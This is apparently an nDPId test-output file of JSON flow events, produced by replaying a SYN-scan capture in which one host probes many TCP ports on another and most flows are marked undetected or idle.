-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1688,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1688,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5802,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5802,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 